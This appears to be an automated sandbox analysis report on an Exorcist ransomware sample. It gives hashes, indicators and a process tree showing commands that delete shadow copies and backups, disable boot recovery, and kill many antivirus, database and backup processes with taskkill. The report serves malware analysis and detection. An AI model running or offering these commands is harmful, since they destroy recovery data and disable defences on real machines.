Analysis
max time kernel: 116s
max time network: 151s
platform: windows10_x64
resource: win10
submitted: 24-07-2020 12:53

Static task: static1

Behavioral task: behavioral1
Sample: f188cf267d209a0209a25bda4bb75b86.exe
Resource: win7v200722

Behavioral task: behavioral2
Sample: f188cf267d209a0209a25bda4bb75b86.exe
Resource: win10

General
Target: f188cf267d209a0209a25bda4bb75b86.exe
Size: 43KB
MD5: f188cf267d209a0209a25bda4bb75b86
SHA1: 3ef4c199d1b5187784f4d709ab8e1cc6901716e8
SHA256: 027d99aaaa6803a07d07ce0ba1fa66964388129d3b26dcf8621a3310692b0a61
SHA512: abe64e07cb279dad66df081d0f374f2948fec444872f09fb968de6b74848414ab354c27598475d919d8a48670e4b42a75eadd6392a550fb727d8422324a9c535
Malware Config
Signatures
Suspicious use of AdjustPrivilegeToken 129 IoCs
Modifies service 2 TTPs 4 IoCs
Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Process: vssadmin.exe (pid 2728)
Exorcist
Ransomware-as-a-service which avoids infecting machines in CIS nations. First seen in mid-2020.
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
Suspicious use of WriteProcessMemory 552 IoCs
memory of 1028 3544 f188cf267d209a0209a25bda4bb75b86.exe 288 PID 1028 wrote to memory of 4016 1028 cmd.exe 290 PID 1028 wrote to memory of 4016 1028 cmd.exe 290 PID 1028 wrote to memory of 4016 1028 cmd.exe 290 PID 3544 wrote to memory of 3640 3544 f188cf267d209a0209a25bda4bb75b86.exe 291 PID 3544 wrote to memory of 3640 3544 f188cf267d209a0209a25bda4bb75b86.exe 291 PID 3544 wrote to memory of 3640 3544 f188cf267d209a0209a25bda4bb75b86.exe 291 PID 3640 wrote to memory of 3824 3640 cmd.exe 293 PID 3640 wrote to memory of 3824 3640 cmd.exe 293 PID 3640 wrote to memory of 3824 3640 cmd.exe 293 PID 3544 wrote to memory of 3804 3544 f188cf267d209a0209a25bda4bb75b86.exe 294 PID 3544 wrote to memory of 3804 3544 f188cf267d209a0209a25bda4bb75b86.exe 294 PID 3544 wrote to memory of 3804 3544 f188cf267d209a0209a25bda4bb75b86.exe 294 PID 3804 wrote to memory of 3968 3804 cmd.exe 296 PID 3804 wrote to memory of 3968 3804 cmd.exe 296 PID 3804 wrote to memory of 3968 3804 cmd.exe 296 PID 3544 wrote to memory of 1392 3544 f188cf267d209a0209a25bda4bb75b86.exe 297 PID 3544 wrote to memory of 1392 3544 f188cf267d209a0209a25bda4bb75b86.exe 297 PID 3544 wrote to memory of 1392 3544 f188cf267d209a0209a25bda4bb75b86.exe 297 PID 1392 wrote to memory of 2992 1392 cmd.exe 299 PID 1392 wrote to memory of 2992 1392 cmd.exe 299 PID 1392 wrote to memory of 2992 1392 cmd.exe 299 PID 3544 wrote to memory of 2700 3544 f188cf267d209a0209a25bda4bb75b86.exe 300 PID 3544 wrote to memory of 2700 3544 f188cf267d209a0209a25bda4bb75b86.exe 300 PID 3544 wrote to memory of 2700 3544 f188cf267d209a0209a25bda4bb75b86.exe 300 PID 2700 wrote to memory of 2968 2700 cmd.exe 302 PID 2700 wrote to memory of 2968 2700 cmd.exe 302 PID 2700 wrote to memory of 2968 2700 cmd.exe 302 PID 3544 wrote to memory of 1496 3544 f188cf267d209a0209a25bda4bb75b86.exe 303 PID 3544 wrote to memory of 1496 3544 f188cf267d209a0209a25bda4bb75b86.exe 303 PID 3544 wrote to memory of 1496 3544 f188cf267d209a0209a25bda4bb75b86.exe 303 PID 
1496 wrote to memory of 2596 1496 cmd.exe 305 PID 1496 wrote to memory of 2596 1496 cmd.exe 305 PID 1496 wrote to memory of 2596 1496 cmd.exe 305 PID 3544 wrote to memory of 2184 3544 f188cf267d209a0209a25bda4bb75b86.exe 306 PID 3544 wrote to memory of 2184 3544 f188cf267d209a0209a25bda4bb75b86.exe 306 PID 3544 wrote to memory of 2184 3544 f188cf267d209a0209a25bda4bb75b86.exe 306 PID 2184 wrote to memory of 2708 2184 cmd.exe 308 PID 2184 wrote to memory of 2708 2184 cmd.exe 308 PID 2184 wrote to memory of 2708 2184 cmd.exe 308 PID 3544 wrote to memory of 3632 3544 f188cf267d209a0209a25bda4bb75b86.exe 309 PID 3544 wrote to memory of 3632 3544 f188cf267d209a0209a25bda4bb75b86.exe 309 PID 3544 wrote to memory of 3632 3544 f188cf267d209a0209a25bda4bb75b86.exe 309 PID 3632 wrote to memory of 3984 3632 cmd.exe 311 PID 3632 wrote to memory of 3984 3632 cmd.exe 311 PID 3632 wrote to memory of 3984 3632 cmd.exe 311 PID 3544 wrote to memory of 2824 3544 f188cf267d209a0209a25bda4bb75b86.exe 312 PID 3544 wrote to memory of 2824 3544 f188cf267d209a0209a25bda4bb75b86.exe 312 PID 3544 wrote to memory of 2824 3544 f188cf267d209a0209a25bda4bb75b86.exe 312 PID 2824 wrote to memory of 3092 2824 cmd.exe 314 PID 2824 wrote to memory of 3092 2824 cmd.exe 314 PID 2824 wrote to memory of 3092 2824 cmd.exe 314 PID 3544 wrote to memory of 3240 3544 f188cf267d209a0209a25bda4bb75b86.exe 315 PID 3544 wrote to memory of 3240 3544 f188cf267d209a0209a25bda4bb75b86.exe 315 PID 3544 wrote to memory of 3240 3544 f188cf267d209a0209a25bda4bb75b86.exe 315 PID 3240 wrote to memory of 3728 3240 cmd.exe 317 PID 3240 wrote to memory of 3728 3240 cmd.exe 317 PID 3240 wrote to memory of 3728 3240 cmd.exe 317 PID 3544 wrote to memory of 1164 3544 f188cf267d209a0209a25bda4bb75b86.exe 318 PID 3544 wrote to memory of 1164 3544 f188cf267d209a0209a25bda4bb75b86.exe 318 PID 3544 wrote to memory of 1164 3544 f188cf267d209a0209a25bda4bb75b86.exe 318 PID 1164 wrote to memory of 520 1164 cmd.exe 320 PID 1164 wrote to 
memory of 520 1164 cmd.exe 320 PID 1164 wrote to memory of 520 1164 cmd.exe 320 PID 3544 wrote to memory of 1912 3544 f188cf267d209a0209a25bda4bb75b86.exe 321 PID 3544 wrote to memory of 1912 3544 f188cf267d209a0209a25bda4bb75b86.exe 321 PID 3544 wrote to memory of 1912 3544 f188cf267d209a0209a25bda4bb75b86.exe 321 PID 1912 wrote to memory of 1196 1912 cmd.exe 323 PID 1912 wrote to memory of 1196 1912 cmd.exe 323 PID 1912 wrote to memory of 1196 1912 cmd.exe 323 PID 3544 wrote to memory of 3900 3544 f188cf267d209a0209a25bda4bb75b86.exe 324 PID 3544 wrote to memory of 3900 3544 f188cf267d209a0209a25bda4bb75b86.exe 324 PID 3544 wrote to memory of 3900 3544 f188cf267d209a0209a25bda4bb75b86.exe 324 PID 3900 wrote to memory of 3936 3900 cmd.exe 326 PID 3900 wrote to memory of 3936 3900 cmd.exe 326 PID 3900 wrote to memory of 3936 3900 cmd.exe 326 PID 3544 wrote to memory of 1320 3544 f188cf267d209a0209a25bda4bb75b86.exe 327 PID 3544 wrote to memory of 1320 3544 f188cf267d209a0209a25bda4bb75b86.exe 327 PID 3544 wrote to memory of 1320 3544 f188cf267d209a0209a25bda4bb75b86.exe 327 PID 1320 wrote to memory of 3788 1320 cmd.exe 329 PID 1320 wrote to memory of 3788 1320 cmd.exe 329 PID 1320 wrote to memory of 3788 1320 cmd.exe 329 PID 3544 wrote to memory of 2096 3544 f188cf267d209a0209a25bda4bb75b86.exe 330 PID 3544 wrote to memory of 2096 3544 f188cf267d209a0209a25bda4bb75b86.exe 330 PID 3544 wrote to memory of 2096 3544 f188cf267d209a0209a25bda4bb75b86.exe 330 PID 2096 wrote to memory of 1512 2096 cmd.exe 332 PID 2096 wrote to memory of 1512 2096 cmd.exe 332 PID 2096 wrote to memory of 1512 2096 cmd.exe 332 PID 3544 wrote to memory of 740 3544 f188cf267d209a0209a25bda4bb75b86.exe 333 PID 3544 wrote to memory of 740 3544 f188cf267d209a0209a25bda4bb75b86.exe 333 PID 3544 wrote to memory of 740 3544 f188cf267d209a0209a25bda4bb75b86.exe 333 PID 740 wrote to memory of 4060 740 cmd.exe 335 PID 740 wrote to memory of 4060 740 cmd.exe 335 PID 740 wrote to memory of 4060 740 
cmd.exe 335 PID 3544 wrote to memory of 1484 3544 f188cf267d209a0209a25bda4bb75b86.exe 336 PID 3544 wrote to memory of 1484 3544 f188cf267d209a0209a25bda4bb75b86.exe 336 PID 3544 wrote to memory of 1484 3544 f188cf267d209a0209a25bda4bb75b86.exe 336 PID 1484 wrote to memory of 904 1484 cmd.exe 338 PID 1484 wrote to memory of 904 1484 cmd.exe 338 PID 1484 wrote to memory of 904 1484 cmd.exe 338 PID 3544 wrote to memory of 2728 3544 f188cf267d209a0209a25bda4bb75b86.exe 339 PID 3544 wrote to memory of 2728 3544 f188cf267d209a0209a25bda4bb75b86.exe 339 PID 3544 wrote to memory of 2728 3544 f188cf267d209a0209a25bda4bb75b86.exe 339 PID 2728 wrote to memory of 2128 2728 cmd.exe 341 PID 2728 wrote to memory of 2128 2728 cmd.exe 341 PID 2728 wrote to memory of 2128 2728 cmd.exe 341 PID 3544 wrote to memory of 2460 3544 f188cf267d209a0209a25bda4bb75b86.exe 342 PID 3544 wrote to memory of 2460 3544 f188cf267d209a0209a25bda4bb75b86.exe 342 PID 3544 wrote to memory of 2460 3544 f188cf267d209a0209a25bda4bb75b86.exe 342 PID 2460 wrote to memory of 404 2460 cmd.exe 344 PID 2460 wrote to memory of 404 2460 cmd.exe 344 PID 2460 wrote to memory of 404 2460 cmd.exe 344 PID 3544 wrote to memory of 3704 3544 f188cf267d209a0209a25bda4bb75b86.exe 345 PID 3544 wrote to memory of 3704 3544 f188cf267d209a0209a25bda4bb75b86.exe 345 PID 3544 wrote to memory of 3704 3544 f188cf267d209a0209a25bda4bb75b86.exe 345 PID 3704 wrote to memory of 492 3704 cmd.exe 347 PID 3704 wrote to memory of 492 3704 cmd.exe 347 PID 3704 wrote to memory of 492 3704 cmd.exe 347 PID 3544 wrote to memory of 1788 3544 f188cf267d209a0209a25bda4bb75b86.exe 348 PID 3544 wrote to memory of 1788 3544 f188cf267d209a0209a25bda4bb75b86.exe 348 PID 3544 wrote to memory of 1788 3544 f188cf267d209a0209a25bda4bb75b86.exe 348 -
Suspicious behavior: EnumeratesProcesses 258 IoCs
Kills process with taskkill 87 IoCs
NTFS ADS 5 IoCs
description | ioc | Process
- File opened for modification | C:\Users\Admin\AppData\Local\Temp\boot.sys:dxvsbnvje | f188cf267d209a0209a25bda4bb75b86.exe
- File created | C:\Users\Admin\AppData\Local\Temp\boot.sys:oudzwxfzjgvlopxy | f188cf267d209a0209a25bda4bb75b86.exe
- File created | C:\Users\Admin\AppData\Local\Temp\boot.sys:dxvsbnvje | f188cf267d209a0209a25bda4bb75b86.exe
- File created | C:\Users\Admin\AppData\Local\Temp\boot.sys:orkjoornvgffpsdex | f188cf267d209a0209a25bda4bb75b86.exe
- File opened for modification | C:\Users\Admin\AppData\Local\Temp\boot.sys:zlnrfdizjwacp | f188cf267d209a0209a25bda4bb75b86.exe
Enumerates connected drives 3 TTPs
-
Modifies extensions of user files 7 IoCs
Ransomware generally changes the extension on encrypted files.
description | ioc | Process
- File renamed | C:\Users\Admin\Pictures\UnprotectSet.raw => C:\Users\Admin\Pictures\UnprotectSet.raw.ePCFSr | f188cf267d209a0209a25bda4bb75b86.exe
- File opened for modification | C:\Users\Admin\Pictures\UnprotectSet.raw.ePCFSr | f188cf267d209a0209a25bda4bb75b86.exe
- File renamed | C:\Users\Admin\Pictures\ExportStep.tif => C:\Users\Admin\Pictures\ExportStep.tif.ePCFSr | f188cf267d209a0209a25bda4bb75b86.exe
- File opened for modification | C:\Users\Admin\Pictures\ExportStep.tif.ePCFSr | f188cf267d209a0209a25bda4bb75b86.exe
- File opened for modification | C:\Users\Admin\Pictures\UnlockDeny.tiff | f188cf267d209a0209a25bda4bb75b86.exe
- File renamed | C:\Users\Admin\Pictures\UnlockDeny.tiff => C:\Users\Admin\Pictures\UnlockDeny.tiff.ePCFSr | f188cf267d209a0209a25bda4bb75b86.exe
- File opened for modification | C:\Users\Admin\Pictures\UnlockDeny.tiff.ePCFSr | f188cf267d209a0209a25bda4bb75b86.exe
Processes
-
Process | Command line | PID (indentation shows the parent/child relationship)

C:\Users\Admin\AppData\Local\Temp\f188cf267d209a0209a25bda4bb75b86.exe | "C:\Users\Admin\AppData\Local\Temp\f188cf267d209a0209a25bda4bb75b86.exe" | PID:3544
  - Suspicious use of WriteProcessMemory
  - Suspicious behavior: EnumeratesProcesses
  - NTFS ADS
  - Modifies extensions of user files
  C:\Windows\SysWOW64\cmd.exe | cmd /C wmic.exe SHADOWCOPY DELETE /nointeractive | PID:3864
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic.exe SHADOWCOPY DELETE /nointeractive | PID:3852
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe | cmd /C wbadmin DELETE SYSTEMSTATEBACKUP | PID:3184
  C:\Windows\SysWOW64\cmd.exe | cmd /C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest | PID:2956
  C:\Windows\SysWOW64\cmd.exe | cmd /C bcdedit.exe /set {default} recoveryenabled No | PID:3984
  C:\Windows\SysWOW64\cmd.exe | cmd /C bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures | PID:4036
  C:\Windows\SysWOW64\cmd.exe | cmd /C vssadmin.exe Delete Shadows /All /Quiet | PID:2824
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\vssadmin.exe | vssadmin.exe Delete Shadows /All /Quiet | PID:2728
      - Interacts with shadow copies
  C:\Windows\SysWOW64\cmd.exe | cmd /C C:\Windows\system32\vssvc.exe | PID:3632
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM wxServer* | PID:3732
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM wxServer* | PID:2996
      - Suspicious use of AdjustPrivilegeToken
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM wxServerView* | PID:3800
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM wxServerView* | PID:3952
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM sqlmangr* | PID:2968
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM sqlmangr* | PID:1864
      - Suspicious use of AdjustPrivilegeToken
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM RAgui* | PID:856
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM RAgui* | PID:412
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM supervise* | PID:2644
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM supervise* | PID:2084
      - Suspicious use of AdjustPrivilegeToken
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM Culture* | PID:492
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM Culture* | PID:3716
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM Defwatch* | PID:392
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM Defwatch* | PID:1160
      - Suspicious use of AdjustPrivilegeToken
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM winword* | PID:496
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM winword* | PID:3720
      - Suspicious use of AdjustPrivilegeToken
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM QBW32* | PID:1212
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM QBW32* | PID:3852
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM QBDBMgr* | PID:1320
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM QBDBMgr* | PID:2992
      - Suspicious use of AdjustPrivilegeToken
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM qbupdate* | PID:2968
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM qbupdate* | PID:1484
      - Suspicious use of AdjustPrivilegeToken
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM axlbridge* | PID:3092
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM axlbridge* | PID:912
      - Suspicious use of AdjustPrivilegeToken
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM httpd* | PID:980
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM httpd* | PID:2600
      - Suspicious use of AdjustPrivilegeToken
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM fdlauncher* | PID:1680
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM fdlauncher* | PID:3728
      - Suspicious use of AdjustPrivilegeToken
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM MsDtSrvr* | PID:1760
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM MsDtSrvr* | PID:3812
      - Suspicious use of AdjustPrivilegeToken
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM java* | PID:396
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM java* | PID:1876
      - Suspicious use of AdjustPrivilegeToken
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM 360se* | PID:1156
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM 360se* | PID:3208
      - Suspicious use of AdjustPrivilegeToken
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM 360doctor* | PID:3816
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM 360doctor* | PID:1064
      - Suspicious use of AdjustPrivilegeToken
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM wdswfsafe* | PID:3528
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM wdswfsafe* | PID:1320
      - Suspicious use of AdjustPrivilegeToken
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM fdhost* | PID:2068
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM fdhost* | PID:1484
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM GDscan* | PID:412
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM GDscan* | PID:2728
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM ZhuDongFangYu* | PID:408
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM ZhuDongFangYu* | PID:2460
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM QBDBMgrN* | PID:2056
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM QBDBMgrN* | PID:2268
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM mysqld* | PID:1676
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM mysqld* | PID:1148
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM AutodeskDesktopApp* | PID:1740
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM AutodeskDesktopApp* | PID:1928
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM acwebbrowser* | PID:1876
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM acwebbrowser* | PID:3708
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM Creative Cloud* | PID:3208
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM Creative Cloud* | PID:3900
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM Adobe Desktop Service* | PID:1392
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM Adobe Desktop Service* | PID:1212
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM CoreSync* | PID:1888
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM CoreSync* | PID:1400
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM Adobe CEF Helper* | PID:3596
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM Adobe CEF Helper* | PID:2848
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM node* | PID:584
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM node* | PID:4036
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM AdobeIPCBroker* | PID:1916
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM AdobeIPCBroker* | PID:2408
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM sync-taskbar* | PID:2824
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM sync-taskbar* | PID:2260
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM sync-worker* | PID:3240
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM sync-worker* | PID:980
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM InputPersonalization* | PID:1164
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM InputPersonalization* | PID:1680
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM AdobeCollabSync* | PID:1912
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM AdobeCollabSync* | PID:1760
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM BrCtrlCntr* | PID:4068
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM BrCtrlCntr* | PID:1868
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM BrCcUxSys* | PID:2956
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM BrCcUxSys* | PID:3720
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM SimplyConnectionManager* | PID:3816
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM SimplyConnectionManager* | PID:1212
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM Simply.SystemTrayIcon* | PID:1400
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM Simply.SystemTrayIcon* | PID:2780
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM fbguard* | PID:3596
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM fbguard* | PID:912
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM fbserver* | PID:1468
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM fbserver* | PID:1008
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM ONENOTEM* | PID:2116
    C:\Windows\SysWOW64\taskkill.exe | taskkill /F /T /IM ONENOTEM* | PID:1644
      - Kills process with taskkill
  C:\Windows\SysWOW64\cmd.exe | cmd /C taskkill /F /T /IM wrapper* | PID:2600
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM wrapper*3⤵PID:3756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM DefWatch*2⤵PID:3716
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM DefWatch*3⤵
- Kills process with taskkill
PID:1780
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM ccEvtMgr*2⤵PID:4016
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM ccEvtMgr*3⤵
- Kills process with taskkill
PID:396
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM ccSetMgr*2⤵PID:3824
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM ccSetMgr*3⤵PID:1156
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SavRoam*2⤵PID:3788
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SavRoam*3⤵
- Kills process with taskkill
PID:2664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Sqlservr*2⤵PID:1512
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Sqlservr*3⤵PID:3528
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sqlagent*2⤵PID:4060
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sqlagent*3⤵
- Kills process with taskkill
PID:1476
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sqladhlp*2⤵PID:904
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sqladhlp*3⤵
- Kills process with taskkill
PID:2068
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Culserver*2⤵PID:2848
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Culserver*3⤵
- Kills process with taskkill
PID:3644
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM RTVscan*2⤵PID:404
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM RTVscan*3⤵
- Kills process with taskkill
PID:2980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sqlbrowser*2⤵PID:492
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sqlbrowser*3⤵
- Kills process with taskkill
PID:3704
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLADHLP*2⤵PID:2060
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLADHLP*3⤵PID:2268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBIDPService*2⤵PID:3612
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBIDPService*3⤵PID:1148
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Intuit.QuickBooks.FCS*2⤵PID:1764
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Intuit.QuickBooks.FCS*3⤵PID:1928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBCFMonitorService*2⤵PID:392
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBCFMonitorService*3⤵PID:3708
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sqlwriter*2⤵PID:2660
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sqlwriter*3⤵
- Kills process with taskkill
PID:1708
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM msmdsrv*2⤵PID:3436
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM msmdsrv*3⤵PID:1608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM tomcat6*2⤵PID:2812
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM tomcat6*3⤵
- Kills process with taskkill
PID:344
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM zhudongfangyu*2⤵PID:3012
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM zhudongfangyu*3⤵
- Kills process with taskkill
PID:2788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM vmware-usbarbitator64*2⤵PID:2164
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM vmware-usbarbitator64*3⤵
- Kills process with taskkill
PID:2156
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM vmware-converter*2⤵PID:2828
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM vmware-converter*3⤵
- Kills process with taskkill
PID:3096
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM dbsrv12*2⤵PID:3016
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM dbsrv12*3⤵
- Kills process with taskkill
PID:2256
-
-
-
